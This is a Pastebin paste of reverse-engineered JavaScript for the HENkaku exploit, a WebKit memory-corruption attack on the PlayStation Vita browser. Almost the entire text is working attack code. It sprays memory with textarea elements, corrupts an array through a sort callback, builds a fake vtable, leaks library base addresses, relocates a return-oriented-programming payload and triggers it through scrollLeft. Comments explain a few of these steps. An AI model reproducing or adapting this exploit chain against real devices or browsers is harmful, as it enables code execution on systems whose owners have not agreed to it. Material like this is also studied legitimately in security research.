SHARE
TWEET

Henkaku exploit - HTML reversed

a guest Aug 1st, 2016 2,315 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script src='payload.js'></script>
  2.  
  3. <script>
  4. var r, a, e, t, n, o, l, i, f, v, s, c;
  5. var u, y, w, p, d, g, h, k, b;
  6. var A, U;
  7.  
  8. var m = 0x40 + payload[16/4];  /* 0x40 bytes for ROP header + 1840 bytes for stack*/
  9. m /= 4;                /* 476 */
  10.  
  11. var _dview = null;
  12.  
  13. /*
  14.     Wrap two uint32s into double precision
  15. */
  16. function u2d(low, hi)
  17. {
  18.   if (!_dview)
  19.     _dview = new DataView(new ArrayBuffer(16));
  20.  
  21.   _dview.setUint32(0, hi);
  22.   _dview.setUint32(4, low);
  23.   return _dview.getFloat64(0)
  24. }
  25.  
  26. /*
  27.     Unwrap uints from double
  28. */
  29. function d2u(d)
  30. {
  31.    if (!_dview)
  32.      _dview = new DataView(new ArrayBuffer(16));
  33.    
  34.    _dview.setFloat64(0, d);
  35.    return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
  36. }
  37.  
  38. // Temporary space to store Element object
  39. var aspace_temp = new Uint32Array(1024);
  40.  
  41. var word1 = 0;
  42. var word2 = 0;
  43.  
  44. function swap(offset)
  45. {
  46.   word1 = aspace32[offset/4];
  47.   word2 = aspace32[offset/4 + 1];
  48.   return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
  49. }
  50.  
  51. r = 0x4000;
  52. textareas = new Array(r);
  53. aspace_arr = new Array(r);
  54. t = 0x1344;
  55. n = 0x66656463;
  56. o = 0x55555555;
  57.  
  58.  
  59. for (var i = 0; i < aspace_arr.length; ++i)
  60. {
  61.   aspace_arr[i] = new Uint32Array(0x1344/4);
  62.   var e = document.createElement("textarea");
  63.   e.rows = 0x66656463;
  64.   textareas[i] = e;
  65. }
  66.  
  67. /*
  68.    Spray memory with Element objects
  69. */
  70. for (var i = 0; i < 1024; ++i)
  71. {
  72.   var e = document.createElement("textarea");
  73.   e.rows = 0x66656463;
  74.   textareas.push(e);
  75. }
  76.  
  77. var N = 0x3000;
  78. var W = Array.prototype.constructor.apply(null,new Array(0x3000));
  79. var j = 2048;
  80. var q = new Array(2048);
  81. var z = {};
  82.  
  83. var C = new Array(256);
  84.  
  85. z.toString = function()
  86.              {
  87.                W.push(12345);
  88.  
  89.                for (var r = 0; r < C.length; ++r)
  90.                {
  91.                  var a = Array.prototype.constructor.apply(null, q);
  92.                  a[0] = 0;
  93.                  a[1] = 1;
  94.                  a[2] = 2;
  95.                  C[r] = a;
  96.                } return""
  97.              };
  98.  
  99. W[0] = z;
  100. var G = u2d(0x80000000, 0x80000000);
  101.  
  102. for (var i = 1; i < 8192; ++i)
  103.   W[i] = G;
  104.  
  105. W.sort();
  106. contents = "";
  107. cur = 0;
  108.  
  109. z.toString = function(){};
  110.  
  111. var I = null;
  112.  
  113. for (var i = 0; i < C.length; ++i)
  114. {
  115.   if(C[i].length != j)
  116.   {
  117.     I = C[i];
  118.     break;
  119.   }
  120. }
  121.  
  122. var count = 0x20000000 - 0x11000;
  123.  
  124. for(; ; count--)
  125. {
  126.   if(I[count] != 0)
  127.   {
  128.     _dview.setFloat64(0, I[J]);
  129.  
  130.     if (_dview.getUint32(0) == t/4)
  131.     {
  132.       _dview.setUint32(0, 0xEFFFFFE0);
  133.      
  134.       I[J] = _dview.getFloat64(0);
  135.       _dview.setFloat64(0, I[J - 2]);
  136.  
  137.       v = _dview.getUint32(4);
  138.       _dview.setUint32(4, 0);
  139.       _dview.setUint32(0, 0x80000000);
  140.      
  141.       I[J-2] = _dview.getFloat64(0);
  142.      
  143.       break;
  144.     }
  145.   }
  146. }
  147.  
  148. target_aspace = null;
  149.  
  150. for (var i = 0; i < aspace_arr.length; ++i)
  151. {
  152.   if(aspace_arr[i].byteLength != t)
  153.   {
  154.     target_aspace = aspace_arr[i];
  155.     break;
  156.   }
  157. }
  158.  
  159. if (!target_aspace)
  160. {
  161.   alert("failed");
  162.   while(1){};
  163. }
  164.  
  165. var aspace32 = target_aspace;
  166. var fkvtable = v;
  167. f = v;
  168.  
  169. /*
  170.    Find one of the sprayed Element objects in memory
  171.    by looking for the rows of the object
  172. */
  173.  
  174. for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
  175. {
  176.   if (aspace32[addr] == 0x66656463)
  177.   {
  178.     aspace32[addr] = 0x55555555;
  179.     textarea_addr = addr * 4;
  180.     found_element = true;
  181.     break;
  182.   }
  183. }
  184.  
  185. if (!found_element)
  186. {
  187.   alert("Did not find Element signature");
  188.   while(1){};
  189. }
  190.  
  191. /*
  192.    Change the rows of the Element object then scan the array of
  193.    sprayed objects to find an object whose rows have been changed
  194. */
  195.  
  196. var found_corrupted = false;
  197. var corrupted_textarea;
  198.  
  199. for (var i = 0; i < textareas.length; ++i)
  200. {
  201.   if(textareas[i].rows == 0x55555555)
  202.   {
  203.     corrupted_textarea = textareas[i];
  204.     found_corrupted = true;
  205.     break;
  206.   }
  207. }
  208.  
  209. if (!found_corrupted)
  210. {
  211.   alert("Did not find corrupted textarea");
  212.   while(1){};
  213. }
  214.  
  215. var vtidx = textarea_addr - 0x70;
  216. var textareavptr = aspace32[vtidx/4];
  217. scewkbase = textareavptr - 0xABB65C;
  218. scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
  219. scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
  220. p = swap(scewkbase + 0x85D2E4) - 0x22D65;
  221. d = swap(p + 0x2C688C) - 0x9E5;
  222. g = swap(d + 0x3BC4) - 0xDC2D;
  223. scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
  224. k = swap(g + 0x18BF4) - 0xD59;
  225. b = swap(k + 0x9AB8) - 0x49CD;
  226.  
  227. // Copy vtable
  228. for (var i = 0; i < 64; i++)
  229.   aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];
  230.  
  231. aspace32[vtidx/4] = fkvtable;
  232.  
  233. // Save Element object
  234. for (var i = 0; i < 0x30; ++i)
  235.   aspace_temp[i] = aspace32[vtidx/4 + i];
  236.  
  237. // Call setjmp
  238. aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;
  239.  
  240. // Undefine scrollLeft
  241. corrupted_textarea.scrollLeft = 0;
  242.  
  243. // Save payload address (jmp context)
  244. payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
  245. payload_addr -= 0xEF818;
  246.  
  247. // Restore Element object
  248. for (var i = 0; i < 0x30; ++i)
  249.   aspace32[vtidx/4 + i] = aspace_temp[i];
  250.  
  251. payload_stack = payload_addr + 0x40;
  252. payload_code = payload_addr + 0x10000;
  253. payload_off = payload_addr/4;
  254.  
  255. // Build ROP payload
  256. for (var i = 0; i < payload.length; ++i,++payload_off)
  257. {
  258.   // Reached the end of ROP header (first 0x770 bytes)
  259.   if (i == 476)
  260.     payload_off = payload_code/4;
  261.  
  262.   switch(relocs[i])
  263.   {
  264.     case 0:
  265.       aspace32[payload_off] = payload[i];
  266.       break;
  267.     case 1:
  268.       aspace32[payload_off] = payload[i] + payload_stack;
  269.       break;
  270.     case 2:
  271.       aspace32[payload_off] = payload[i] + scewkbase;
  272.       break;
  273.     case 3:
  274.       aspace32[payload_off] = payload[i] + scekernbase;
  275.       break;
  276.     case 4:
  277.       aspace32[payload_off] = payload[i] + scelibcbase;
  278.       break;
  279.     case 5:
  280.       aspace32[payload_off] = payload[i] + g;
  281.       break;
  282.     case 6:
  283.       aspace32[payload_off] = payload[i] + scenetbase;
  284.       break;
  285.     case 7:
  286.       aspace32[payload_off] = payload[i] + b;
  287.       break;
  288.     default:
  289.       alert("wtf?");
  290.       alert(i + " " + relocs[i])
  291.    }
  292. }
  293.  
  294. // Trigger ROPchain
  295. aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8;   /* LDM R1 gadget */
  296.  
  297. var rchainaddr = fkvtable + 0x100;
  298.  
  299. aspace32[rchainaddr/4 + 5] = payload_code;
  300. aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;
  301.  
  302. alert("Welcome to HENkaku!");
  303.  
  304. // Set scrollLeft to ROP chain
  305. corrupted_textarea.scrollLeft = rchainaddr;
  306.  
  307. alert("that's it");
  308. </script>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top